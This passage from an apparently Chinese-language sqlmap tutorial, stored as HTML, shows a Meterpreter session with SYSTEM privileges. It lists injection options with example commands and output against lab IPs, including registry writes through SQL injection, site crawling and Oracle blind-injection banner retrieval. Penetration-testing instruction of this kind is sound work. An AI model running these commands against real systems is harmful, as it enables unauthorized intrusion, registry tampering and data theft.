New';\">Meterpreter&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;x86\/win32<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Server&nbsp;username:&nbsp;NT&nbsp;AUTHORITY\\SYSTEM<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;ipconfig<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">MS&nbsp;TCP&nbsp;Loopback&nbsp;interface<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Hardware&nbsp;MAC:&nbsp;00:00:00:00:00:00<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">IP&nbsp;Address&nbsp;&nbsp;:&nbsp;127.0.0.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Netmask&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;255.0.0.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Intel(R)&nbsp;PRO\/1000&nbsp;MT&nbsp;Network&nbsp;Connection<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Hardware&nbsp;MAC:&nbsp;00:0c:29:fc:79:39<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">IP&nbsp;Address&nbsp;&nbsp;:&nbsp;192.168.136.129<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Netmask&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;255.255.255.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;exit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;closed.&nbsp;&nbsp;Reason:&nbsp;User&nbsp;exit<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>MySQL<\/span><span>\u5728<\/span><span>Windows<\/span><span>\u4e0a\u4ee5<\/span><span>SYSTEM<\/span><span>\u6743\u9650\u8fd0\u884c\uff0c<\/span><span>PostgreSQL<\/span><span>\u5728<\/span><span>Windows<\/span><span>\u4e0e<\/span><span>Linux<\/span><span>\u4e2d\u662f\u4f4e\u6743\u9650\u8fd0&nbsp;\u884c\uff0c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2000<\/span><span>\u9ed8\u8ba4\u662f\u4ee5<\/span><span>SYSTEM<\/span><span>\u6743\u9650\u8fd0\u884c\uff0c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span>\u4e0e<\/span><span>2008<\/span><span>\u5927\u90e8\u5206\u662f\u4ee5<\/span><span>NETWORK&nbsp;SERVICE<\/span><span>\u6709\u65f6\u662f<\/span><span>LOCAL&nbsp;SERVICE<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%AF%B9Windows%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%93%8D%E4%BD%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d<\/span><span>web<\/span><span>\u5e94\u7528\u652f\u6301\u5806\u67e5\u8be2\u3002&nbsp;\u5f53\u7136\uff0c\u5f53\u524d\u8fde\u63a5\u6570\u636e\u5e93\u7684\u7528\u6237\u4e5f\u9700\u8981\u6709\u6743\u9650\u64cd\u4f5c\u6ce8\u518c\u8868\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AF%BB%E5%8F%96%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bfb\u53d6\u6ce8\u518c\u8868\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;reg-read<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%86%99%E5%85%A5%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5199\u5165\u6ce8\u518c\u8868\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;reg-add<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%A0%E9%99%A4%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5220\u9664\u6ce8\u518c\u8868\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;reg-del<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%86%8C%E8%A1%A8%E8%BE%85%E5%8A%A9%E9%80%89%E9%A1%B9\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;reg-key<\/span><span>\uff0c<\/span><span>&#8211;reg-value<\/span><span>\uff0c<\/span><span>&#8211;reg-data<\/span><span>\uff0c<\/span><span>&#8211;reg-type<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9700\u8981\u914d\u5408\u4e4b\u524d\u4e09\u4e2a\u53c2\u6570\u4f7f\u7528\uff0c\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;http:\/\/192.168.136.129\/sqlmap\/pgsql\/get_int.aspx?id=1&nbsp;&#8211;reg-add&nbsp;&#8211;reg-key=&#8221;HKEY_LOCAL_MACHINE\\SOFTWARE\\sqlmap&#8221;&nbsp;&#8211;reg-value=Test&nbsp;&#8211;reg-type=REG_SZ&nbsp;&#8211;reg-data=1<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%B8%B8%E8%A7%84%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5e38\u89c4\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8Esqlite%E4%B8%AD%E8%AF%BB%E5%8F%96session\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ecesqlite\u4e2d\u8bfb\u53d6session<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-s<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u5bf9\u6bcf\u4e00\u4e2a\u76ee\u6807\u90fd\u4f1a\u5728<\/span><span>output<\/span><span>\u8def\u5f84\u4e0b\u81ea\u52a8\u751f\u6210\u4e00\u4e2a<\/span><span>SQLite<\/span><span>\u6587\u4ef6\uff0c\u5982\u679c\u7528\u6237\u60f3\u6307\u5b9a\u8bfb\u53d6\u7684\u6587\u4ef6\u8def\u5f84\uff0c\u5c31\u53ef\u4ee5\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BF%9D%E5%AD%98HTTPS%E6%97%A5%E5%BF%97\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4fdd\u5b58HTTP(S)\u65e5\u5fd7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-t<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e2a\u53c2\u6570\u9700\u8981\u8ddf\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\uff0c<span>sqlmap<\/span><span>\u4f1a\u628a<\/span><span>HTTP(S)<\/span><span>\u8bf7\u6c42\u4e0e\u54cd\u5e94\u7684\u65e5\u5fd7\u4fdd\u5b58\u5230\u90a3\u91cc\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%9D%9E%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u975e\u4ea4\u4e92\u6a21\u5f0f<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;batch<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7528\u6b64\u53c2\u6570\uff0c\u4e0d\u9700\u8981\u7528\u6237\u8f93\u5165\uff0c\u5c06\u4f1a\u4f7f\u7528<span>sqlmap<\/span><span>\u63d0\u793a\u7684\u9ed8\u8ba4\u503c\u4e00\u76f4\u8fd0\u884c\u4e0b\u53bb\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BC%BA%E5%88%B6%E4%BD%BF%E7%94%A8%E5%AD%97%E7%AC%A6%E7%BC%96%E7%A0%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;charset<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0d\u4f7f\u7528<span>sqlmap<\/span><span>\u81ea\u52a8\u8bc6\u522b\u7684\uff08\u5982<\/span><span>HTTP<\/span><span>\u5934\u4e2d\u7684<\/span><span>Content-Type<\/span><span>\uff09\u5b57\u7b26\u7f16\u7801\uff0c\u5f3a\u5236\u6307\u5b9a\u5b57\u7b26\u7f16\u7801\u5982\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8211;charset=GBK<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%88%AC%E8%A1%8C%E7%BD%91%E7%AB%99URL\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u722c\u884c\u7f51\u7ad9URL<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;crawl<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u6536\u96c6\u6f5c\u5728\u7684\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u7684\u8fde\u63a5\uff0c\u540e\u9762\u8ddf\u7684\u53c2\u6570\u662f\u722c\u884c\u7684\u6df1\u5ea6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.128\/sqlmap\/mysql\/&#8221;&nbsp;&#8211;batch&nbsp;&#8211;crawl=3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[INFO]&nbsp;starting&nbsp;crawler<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[INFO]&nbsp;searching&nbsp;for&nbsp;links&nbsp;with&nbsp;depth&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[WARNING]&nbsp;running&nbsp;in&nbsp;a&nbsp;single-thread&nbsp;mode.&nbsp;This&nbsp;could&nbsp;take&nbsp;a&nbsp;while<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[INFO]&nbsp;searching&nbsp;for&nbsp;links&nbsp;with&nbsp;depth&nbsp;2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:54]&nbsp;[INFO]&nbsp;heuristics&nbsp;detected&nbsp;web&nbsp;page&nbsp;charset&nbsp;&#8216;ascii&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:00]&nbsp;[INFO]&nbsp;42\/56&nbsp;links&nbsp;visited&nbsp;(75%)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%A7%84%E5%AE%9A%E8%BE%93%E5%87%BA%E5%88%B0CSV%E4%B8%AD%E7%9A%84%E5%88%86%E9%9A%94%E7%AC%A6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;csv-del<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>dump<\/span><span>\u4fdd\u5b58\u4e3a<\/span><span>CSV<\/span><span>\u683c\u5f0f\u65f6\uff08<\/span><span>&#8211;dump-format=CSV<\/span><span>\uff09\uff0c\u9700\u8981\u4e00\u4e2a\u5206\u9694\u7b26\u9ed8\u8ba4\u662f\u9017\u53f7\uff0c\u7528\u6237\u4e5f\u53ef\u4ee5\u6539\u4e3a\u522b\u7684&nbsp;\u5982\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8211;csv-del=&#8221;;&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"DBMS%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">DBMS\u8eab\u4efd\u9a8c\u8bc1<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dbms-cred<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u67d0\u4e9b\u65f6\u5019\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u4e0d\u591f\uff0c\u505a\u67d0\u4e9b\u64cd\u4f5c\u4f1a\u5931\u8d25\uff0c\u5982\u679c\u77e5\u9053\u9ad8\u6743\u9650\u7528\u6237\u7684\u5bc6\u7801\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u6709\u7684\u6570\u636e\u5e93\u6709\u4e13\u95e8\u7684\u8fd0\u884c\u673a\u5236\uff0c\u53ef\u4ee5\u5207\u6362\u7528\u6237\u5982<span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u7684<\/span><span>OPENROWSET<\/span><span>\u51fd\u6570<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%AE%9A%E4%B9%89dump%E6%95%B0%E6%8D%AE%E7%9A%84%E6%A0%BC%E5%BC%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dump-format<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8f93\u51fa\u7684\u683c\u5f0f\u53ef\u5b9a\u4e49\u4e3a\uff1a<span>CSV<\/span><span>\uff0c<\/span><span>HTML<\/span><span>\uff0c<\/span><span>SQLITE<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A2%84%E4%BC%B0%E5%AE%8C%E6%88%90%E6%97%B6%E9%97%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u9884\u4f30\u5b8c\u6210\u65f6\u95f4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;eta<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8ba1\u7b97\u6ce8\u5165\u6570\u636e\u7684\u5269\u4f59\u65f6\u95f4\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982<span>Oracle<\/span><span>\u7684\u5e03\u5c14\u578b\u76f2\u6ce8\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/oracle\/get_int_bool.php?id=1&#8221;&nbsp;-b&nbsp;&#8211;eta<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;Oracle<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;fetching&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;retrieving&nbsp;the&nbsp;length&nbsp;of&nbsp;query&nbsp;output<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;retrieved:&nbsp;64<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">17%&nbsp;[========&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;]&nbsp;11\/64&nbsp;&nbsp;ETA&nbsp;00:19<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7136\u540e\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">100%&nbsp;[===================================================]&nbsp;64\/64<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:53]&nbsp;[INFO]&nbsp;retrieved:&nbsp;Oracle&nbsp;Database&nbsp;10g&nbsp;Enterprise&nbsp;Edition&nbsp;Release&nbsp;10.2.0.1.0&nbsp;&#8211;&nbsp;Prod<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;PHP&nbsp;5.2.6,&nbsp;Apache&nbsp;2.2.9<\/span><span 